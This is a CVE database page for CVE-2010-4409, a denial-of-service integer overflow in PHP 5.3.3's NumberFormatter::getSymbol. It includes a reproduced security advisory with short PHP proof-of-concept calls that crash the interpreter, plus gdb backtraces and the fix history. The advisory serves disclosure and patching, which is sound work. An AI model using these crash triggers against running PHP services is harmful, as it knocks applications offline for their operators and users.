CVE-2010-4409 : Detail

CVE-2010-4409

2.84%V3
Network
2010-12-06
19h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer overflow in the NumberFormatter::getSymbol (aka numfmt_get_symbol) function in PHP 5.3.3 and earlier allows context-dependent attackers to cause a denial of service (application crash) via an invalid argument.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 15722

Publication date : 2010-12-09 23h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : No

From: Maksymilian Arciemowicz <cxib () securityreason com> Date: Fri, 10 Dec 2010 14:43:32 +0100 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [ PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 11.11.2010 - - Pub.: 10.12.2010 CERT: VU#479900 CVE: CVE-2010-4409 CWE: CWE-189 Status: Fixed in PHP 5.3.4 Affected Software: - - PHP 5.3.3 Original URL: http://securityreason.com/achievement_securityalert/91 - --- 0.Description --- Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. Number Formatter: allows to display number according to the localized format or given pattern or set of rules, and to parse strings into numbers. - --- 1. PoC for Integer Overflow --- $nx=new NumberFormatter("pl",1); $nx->getSymbol(2147483648); - --- 2. PHP 5.3.3/5.2.14 NumberFormatter::getSymbol Integer Overflow --- As we can see in - --- PHP_FUNCTION( numfmt_get_symbol ) { long symbol; UChar value_buf[4]; UChar *value = value_buf; int length = USIZE(value); FORMATTER_METHOD_INIT_VARS; /* Parse parameters. */ if( zend_parse_method_parameters( ZEND_NUM_ARGS() TSRMLS_CC, getThis(), "Ol", &object, NumberFormatter_ce_ptr, &symbol ) == FAILURE ) { intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR, "numfmt_get_symbol: unable to parse input params", 0 TSRMLS_CC ); RETURN_FALSE; } /* Fetch the object. */ FORMATTER_METHOD_FETCH_OBJECT; length = unum_getSymbol(FORMATTER_OBJECT(nfo), symbol, value_buf, length, &INTL_DATA_ERROR_CODE(nfo)); <================= !!!TO BIG INT HERE!!! ... - --- will crash for differ value. example {2444492804, 2147483648, 2147483649, 2554462209} (when rdi out off band (range 2to31 2to32 under 64bits linux) Program received signal SIGSEGV, Segmentation fault. 0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42 (gdb) bt #0 0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42 #1 0x00007fffee5d11c0 in zif_numfmt_get_symbol (ht=17168120, return_value=0x105c928, return_value_ptr=0x4, this_ptr=0x105f710, return_value_used=17168144) at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:269 ...blabla rip 0x7fffedf317f5 0x7fffedf317f5 <icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const+21> eflags 0x10206 [ PF IF RF ] let`s see value ~4294901761 $nx=new NumberFormatter("pl",1); $nx->getSymbol(4294901761); will crash in memcpy(3) ;] Program received signal SIGSEGV, Segmentation fault. memcpy () at ../sysdeps/x86_64/memcpy.S:90 90 ../sysdeps/x86_64/memcpy.S: No such file or directory. in ../sysdeps/x86_64/memcpy.S (gdb) bt #0 memcpy () at ../sysdeps/x86_64/memcpy.S:90 #1 0x00007fffea74a86a in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42 #2 0x00007fffeadea2b4 in zif_numfmt_get_symbol (ht=17826952, return_value=0x10fecd0, return_value_ptr=0xc, this_ptr=0x11004a0, return_value_used=17826976) at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:274 #3 0x00000000006e986a in zend_do_fcall_common_helper_SPEC ( execute_data=0x7ffff7eb8068) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316 ... let's see ICU UnicodeString::extract(unsigned short*, int, UErrorCode&) - --- int32_t UnicodeString::extract(UChar *dest, int32_t destCapacity, UErrorCode &errorCode) const { int32_t len = length(); if(U_SUCCESS(errorCode)) { if(isBogus() || destCapacity<0 || (destCapacity>0 && dest==0)) { errorCode=U_ILLEGAL_ARGUMENT_ERROR; } else { const UChar *array = getArrayStart(); if(len>0 && len<=destCapacity && array!=dest) { uprv_memcpy(dest, array, len*U_SIZEOF_UCHAR); <======= MEMCPY REFERENCE HERE } return u_terminateUChars(dest, destCapacity, len, &errorCode); } } return len; } - --- so crash in rip=memcpy(3). Method getLocal() also can generate simple crash (CWE-170) $nx=new IntlDateFormatter("pl", IntlDateFormatter::FULL, IntlDateFormatter::FULL); $nx->getLocale(1); - --- 3. Fix --- Fix in next PHP Version 5.3.4: http://www.kb.cert.org/vuls/id/479900 SVN: http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/dateformat/dateformat_attr.c?view=log http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/formatter/formatter_attr.c?view=log - --- 4. Greets --- Special thanks for Pierre Joye and Stas Malyshev for very quickly fix Michael Orlando for security support and sp3x, Infospec - --- 5. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: - - cxib {a\./t] securityreason [d=t} com GPG: - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://cxib.net/ - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) <max () cxib net> sub 4096R/58BA663C 2010-09-19 -----BEGIN PGP SIGNATURE----- iQIcBAEBAgAGBQJNAi5vAAoJEIO8+dzW5bUwsdsP/3/XRI/fXcqRg154DObVa/Ew LgVS9ZP5yrTG2JBZnYYSHRB6ZXpK7hEfM838/gVLAolMEnLplynqmiTef74gHBAN /VIGpE7sZDsxTeAk+MWzecxS0Gp77kR8ibcd8kClKmdcodgZ+JSJab/3snAclBXT CesuN20tUPS4d7sjxTz7K9uZhO+7ezZn6xnJr67l2xcx8xCcrnNNRzapEzQ6tcBj cM3pMxond3uAGQT3+ewwl1GQ/30HkX3fjPJPhT6Mna9/LH7f5IGHSnSxw5lJbUjY xMaB+qTE44TrKTKqKkkowsPpAeaoQ7a3O16YG6qcWfly+9bf2vQVNhcG+hAa6mgK ekNkleDKg+n7Qsgsrl/4mFS/40tCTss9/PQ8/QEp2g4VOSeyzuoVB2PJDl48X4pH xabNVh9T3LWkxTnC5wcy2tuF7Tbb1eOngMxBclB9xR6vjr0nqT5EHLy4w+VnXo3I FICv2EhojYXpxgrQEteK0JVnZC3ROspAJDM7YC4ZXk4HSRKnFK2Ymf+yyzhycyHu cj1F70DTCNvXfdWUuvKVlTQUM4BDGpR1xs23EZqVky+8lk1mRJW98UwCs0kqpN46 maS8ZXM1+8dEMZFx/2wRcI2xkFoViMuKFpqwvVG+TPYY0fUSUfNdYCoxxl4YiWdD u0SjiF38TxqaIjNnvaym =3G4F -----END PGP SIGNATURE-----

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 5.3.3

Php>>Php >> Version 1.0

Php>>Php >> Version 2.0

Php>>Php >> Version 2.0b10

Php>>Php >> Version 3.0

Php>>Php >> Version 3.0.1

Php>>Php >> Version 3.0.2

Php>>Php >> Version 3.0.3

Php>>Php >> Version 3.0.4

Php>>Php >> Version 3.0.5

Php>>Php >> Version 3.0.6

Php>>Php >> Version 3.0.7

Php>>Php >> Version 3.0.8

Php>>Php >> Version 3.0.9

Php>>Php >> Version 3.0.10

Php>>Php >> Version 3.0.11

Php>>Php >> Version 3.0.12

Php>>Php >> Version 3.0.13

Php>>Php >> Version 3.0.14

Php>>Php >> Version 3.0.15

Php>>Php >> Version 3.0.16

Php>>Php >> Version 3.0.17

Php>>Php >> Version 3.0.18

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.5

Php>>Php >> Version 4.0.6

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.1.0

Php>>Php >> Version 4.1.1

Php>>Php >> Version 4.1.2

Php>>Php >> Version 4.2.0

Php>>Php >> Version 4.2.1

Php>>Php >> Version 4.2.2

Php>>Php >> Version 4.2.3

Php>>Php >> Version 4.3.0

Php>>Php >> Version 4.3.1

Php>>Php >> Version 4.3.2

Php>>Php >> Version 4.3.3

Php>>Php >> Version 4.3.4

Php>>Php >> Version 4.3.5

Php>>Php >> Version 4.3.6

Php>>Php >> Version 4.3.7

Php>>Php >> Version 4.3.8

Php>>Php >> Version 4.3.9

Php>>Php >> Version 4.3.10

Php>>Php >> Version 4.3.11

Php>>Php >> Version 4.4.0

Php>>Php >> Version 4.4.1

Php>>Php >> Version 4.4.2

Php>>Php >> Version 4.4.3

Php>>Php >> Version 4.4.4

Php>>Php >> Version 4.4.5

Php>>Php >> Version 4.4.6

Php>>Php >> Version 4.4.7

Php>>Php >> Version 4.4.8

Php>>Php >> Version 4.4.9

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.1

Php>>Php >> Version 5.3.2

References

http://www.vupen.com/english/advisories/2011/0077
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/47674
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/42812
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2010:255
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.ubuntu.com/usn/USN-1042-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.vupen.com/english/advisories/2011/0021
Tags : vdb-entry, x_refsource_VUPEN
http://www.php.net/ChangeLog-5.php
Tags : x_refsource_CONFIRM
http://www.mandriva.com/security/advisories?name=MDVSA-2010:254
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.exploit-db.com/exploits/15722
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2011/0020
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/45119
Tags : vdb-entry, x_refsource_BID
http://support.apple.com/kb/HT4581
Tags : x_refsource_CONFIRM
http://www.kb.cert.org/vuls/id/479900
Tags : third-party-advisory, x_refsource_CERT-VN